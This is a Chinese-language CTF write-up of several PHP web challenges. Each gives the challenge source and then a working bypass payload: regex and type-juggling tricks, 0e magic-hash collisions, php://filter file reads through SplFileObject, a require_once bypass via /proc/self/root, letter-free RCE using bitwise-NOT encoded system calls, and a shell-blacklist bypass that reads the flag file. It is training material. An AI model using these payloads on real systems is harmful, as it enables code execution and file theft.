ezPhp

(自己找之前做过的题目拼凑改编出的)

 <?php
// CTF challenge source: prints itself, then gates an object instantiation behind a chain of filter checks.
highlight_file(__FILE__);

// Raw query string (not URL-decoded); the later regex filter runs against this, not against $_GET.
$query = $_SERVER['QUERY_STRING'];

if (isset($_GET['a'])&&isset($_GET['b'])) {
echo 'ok';
echo '<br>';
$a = $_GET['a'];
$b = $_GET['b'];
// Gate 1: 'a' must contain "ruheraoguo" yet differ from it (loose !=); 'b' must contain no ASCII digit
// yet give a non-zero intval(). NOTE(review): preg_match() on a non-string subject is a TypeError on
// PHP 8, so the non-string bypass this writeup relies on appears to presume PHP 7 — verify the target version.
if (preg_match('/ruheraoguo/', $a . 'hello') && $a != 'ruheraoguo' && !preg_match('/[0-9]/', $b) && intval($b)) {
echo 'so easy';
echo '<br>';
// Read without isset(): a missing parameter yields a notice and null.
$o_k_k = $_GET['o_k_k'];
// Gate 2: the raw query string may not contain '_', '.' or their percent-encodings;
// md5($o_k_k) == $o_k_k is a loose (==) comparison, so numeric-looking strings compare as numbers.
if (!preg_match('/%5f|_|\.|%2E/i', $query) && md5($o_k_k) == $o_k_k) {
echo 'nice';
echo '<br>';
// Instantiates a class whose name and constructor argument both come from the request body and
// echoes the result — class name and argument are fully request-controlled at this point.
echo new $_POST['a']($_POST['b']);
}

}
}

preg_match('/ruheraoguo/', $a . 'hello') && $a != 'ruheraoguo'

preg_match的绕过,\n 或者%0a , 都可以
a=ruheraoguo%0a

!preg_match('/[0-9]/', $b) && intval($b)

intval() 对于非空的 array 返回 1,且数组作为 preg_match 的参数时会使其返回 false(PHP 7 下如此;PHP 8 中向 preg_match 传入数组会抛出 TypeError)
b[]=1

!preg_match('/_|%5f|\.|%2E|\[|%5B/i', $a) && md5($o_k_k) == $o_k_k

PHP 解析参数名时会把其中的空格(以及 . 等非法字符)转换成 _,所以参数名 o k k 会被当作 o_k_k 接收,从而绕过对 _ 的过滤
双MD5($a==md5($a)):以0e开头的字符串经过MD5加密后依旧以0e开头(PHP 的 == 会把这类以 0e 开头的纯数字字符串当作数值 0 进行比较)
网上可以找到很多这样的字符串
o k k=0e00506035745

echo new $_POST['a']($_POST['b']);

利用 SplFileObject 配合php伪协议 读取文件

a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag.php

is_php

 <?php
// CTF challenge source (level 1): rewrites the submitted string, then looks for a marker in the result.
error_reporting(0);
highlight_file(__FILE__);
// hint.php is not shown here; $level2 echoed below presumably comes from it — verify.
include'hint.php';
if(isset($_POST['hhh']))
{
// Blacklist-style rewrite: when the whole input matches, the word "level" is replaced by an HTML comment.
// This is a rewrite, not a validation — nothing is removed unless the pattern matches the input as a whole.
$hhh = preg_replace('/^(.*)level(.*)$/', '${1}<!-- nonono -->${2}', $_POST['hhh']);
// Success requires the substring "pass_level_1" to survive the rewrite above.
if (preg_match('/pass_level_1/', $hhh)){
echo $level2;
}
else{
echo "no";
}
}
else
echo "???";
?> ???
?a=system&b=cat [a-z][a-z][a-z][a-z][a-z][a-z][a-z][a-z]ag.php

通配符的绕过,过滤了 ? 和 *
利用 [a-z] 匹配在a-z之间的字符

flag{sfs-kihk-j2sd-aas}

ezphp

level1.php

 <?php
// CTF challenge source: cookie-gated inclusion of a request-supplied path.
error_reporting(0);
highlight_file(__FILE__);
require_once 'happy.php';

// Loose (==) comparison against a cookie value; cookies are client-controlled.
if($_COOKIE['name']=="Genshin_Impact")
{
// Read before the isset() check below, so a missing 'pai' raises a notice (hidden by error_reporting(0)).
$yy = $_GET['pai'];
if(isset($_GET['pai']))
{
// Includes whatever path or stream wrapper the request names — file inclusion with no allow-list.
// require_once() skips a file that was already included (happy.php above), which is why the
// writeup reaches it through a differently-spelled path.
require_once($yy);
}
}
else
die('You should to play Genshin Impact!');
?> You should to play Genshin Impact!

require_once的绕过,多级符号软链接
/proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接

?pai=php://filter/convert.base64-
encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/happy.php

Levv_vve_ve2.php

 <?php
// CTF challenge source: eval() of a GET parameter, guarded only by a letter blacklist.
highlight_file(__FILE__);
error_reporting(0);
$flower = $_GET['lily'];
// Rejects any ASCII letter; digits, punctuation and non-ASCII bytes are not covered by this check.
if (preg_match('/[a-zA-Z]+/', $flower))
{
die("you can't use it");
}
else
{
// Arbitrary PHP execution on whatever passed the filter above.
eval($flower);
}
?>

无字母rce取反

<?php
// Helper used by the writeup: prints the URL-encoded bitwise NOT (~) of two strings.
echo urlencode(~'system');
// Single-quoted '\n\n' is a literal backslash-n pair, not a newline — hence the "\n\n" in the output below.
echo '\n\n';
echo urlencode(~'cat /fllll1laggg.php');
//%8C%86%8C%8B%9A%92\n\n%9C%9E%8B%DF%D0%99%93%93%93%93%CE%93%9E%98%98%98%D1%8F%97%8F
?lily=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%CE%93%9E%98%98%98%D1%8F%97%8F);
--> system("cat /fllll1laggg.php");

flag{Th1s_@a_TesT_fll1llag}

caiji


<?php
// CTF challenge source: extract($_GET) lets the request overwrite the defaults set here.
$id="nulijiuhui";
$c="woyaoxueweb";
// Imports every GET parameter as a local variable — $id and $c above are clobbered by same-named parameters.
extract($_GET);
highlight_file('index.php');
// flag.php is not shown; $flag echoed below presumably comes from it — verify.
include("flag.php");
$json=json_decode($_GET['json'],true);
// Loose (==) comparisons; $json['cai'] is indexed without checking that json_decode() succeeded.
if ($id=="caijiuduolian"&&$json['cai']=="will")
{
$a=$_POST['a'];
$b=$_POST['b'];
// Loose != on the raw inputs, loose == on their md5() digests.
// NOTE(review): md5() on a non-string argument is a TypeError on PHP 8; the array inputs used in
// this writeup assume PHP 7 semantics (md5() yielding null for both) — verify the target version.
if($a!=$b&&md5($a)==md5($b))
{
{
// "I_want_flag_" is itself exactly 12 characters, so the two checks together pin $c to that value.
if(strlen($c)==12&&preg_match('/I_want_flag_/',$c))
{
echo $flag;
}
else{
die('hacker!');
}
}
}
else{
echo "jiuchayidiandian!";
}
}
else{
echo "cai,o!";
}
echo "\n";
echo $id;
?>
cai,o! nulijiuhui
?id=caijiuduolian&json={"cai":"will"}&c=I_want_flag_
//json语法,json对象是一种存储数据的方式,它使用键值对的形式表示数据
a[]=1&b[]=2

flag{Easy^php_isn’t!!!}

php来咯

1.php

 <?php
// CTF challenge source: a loose md5 comparison gates a request-named object instantiation.
highlight_file(__FILE__);
error_reporting(0);
include'flag.php';
// Read before isset(); with error_reporting(0) the notice for a missing parameter is hidden.
$md5 = $_GET['md5'];
// Loose (==) comparison between the input and its own md5 digest — numeric-looking strings
// (e.g. the "0e..." forms used in this writeup) compare as numbers rather than as strings.
if (isset($md5) && $md5 == md5($md5))
{
// Class name and constructor argument both come from the POST body.
echo new $_POST['c']($_POST['d']);
}else
{
echo "have a try~";
}
?> have a try~

利用 SplFileObject 配合php伪协议 读取文件

?md5=0e00275209979
c=SplFileObject&d=php://filter/convert.base64-encode/resource=flag.php

ssdxgy_xyz_xy.php -->第二关:

ssdxgy_xyz_xy.php

 <?php
// CTF challenge source: two loosely-compared inputs gate an eval() of a GET parameter.
highlight_file(__FILE__);
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
// Loose (==) comparisons; $json['x'] is indexed without checking that json_decode() succeeded.
if ($id=="wllmNB"&&$json['x']=="wllm")
{
if(isset($_GET['url']))
{
// Arbitrary PHP execution straight from the query string.
eval($_GET['url']);
}
else {
echo "try,try";
}

}
else{
echo "try,try,try";
}
?> try,try,try
?json={"x":"wllm"}&url=system("cat /fllll1laggg.php");

id=wllmNB

flag{Th2s_@a_TesT23_fll1llag}

ezrce

<?php 
// CTF challenge source: a character blacklist plus a letter blacklist in front of eval().
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
$wllm = $_GET['wllm'];
// Each entry is spliced into a PCRE pattern unescaped, so these are regex fragments
// ('\t' is the PCRE tab escape, '\[' a literal bracket), not plain substrings.
$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
foreach ($blacklist as $blackitem)
{
if (preg_match('/' . $blackitem . '/m', $wllm)) {
die("菜鸡说你的符号不行哦!");
}}
// Second gate: no ASCII letters at all (case-insensitive). Digits, '~', '(', ')', ';' and
// non-ASCII bytes fall outside both lists, which is what the writeup's payload relies on.
if(preg_match('/[a-zA-Z]/is',$wllm))
{
die("你觉得能使用字母嘛!");
}
echo "xbjscj说:你做的很好,但还差一点点哟";
// Arbitrary PHP execution on whatever passed both gates.
eval($wllm);
}
else
{
echo "小伙子要注意审题哦!!!";
} 小伙子要注意审题哦!!!

无字母rce 取反

?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);  ==>  bin boot dev etc fllll1laggg.php home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var 
//system("ls /");
?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%CE%93%9E%98%98%98%D1%8F%97%8F);
//system("cat /fllll1laggg.php");
flag{Th1s_@a_TesT_fll1llag}

水果忍者

一个游戏,在js代码里面找相应的base64字符解码就行

将”无敌火影大王“base64编码后就是flag啦格式flag{转换后的编码}

if(a==md5(a)) 满足这个条件的值+上面内容一起才是真正的flag,格式为flag{上面那个+满足的值}
(这题应该是有问题的,毕竟满足这样条件的a是有很多个来着,题目应该出错了)

a=0e00275209979

ezPHP

 <?php
// CTF challenge source: keyword/character blacklist in front of system().
error_reporting(0);
if(isset($_GET["cmd"])){
// Case-insensitive blacklist: common read/list keywords plus shell metacharacters, space, '/', '\' and '*'.
// Keyword blacklists are inherently incomplete — the writeup notes that 'ls' is absent, and
// '$' and '@' are not filtered either.
if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
echo "Don't Hack Me";
}else{
// Passes the filtered string straight to a shell.
system($_GET["cmd"]);
}
}else{
show_source(__FILE__);
}
?>

写的时候就是卡这题了,忘记他没过滤ls,审题不仔细
然后就是字符拼接也卡到了,本来是想着通过 (c.a.t) 拼接的,但没有成功,感觉应该是可以的吧
确实也没想到可以用 $@ 进行拼接,也是学到了

?cmd=cd%09..%26%26cd%09..%26%26cd%09..%26%26t$@ac%09ffff$@llllagggg;
%09-->绕过空格
t$@ac ==> tac $@绕过tac,用于字符拼接
%26%26 --> && 可以用于连接多个命令,使得前一个命令成功执行后才执行下一个命令;

flag{12312hjghfghfghfdgd}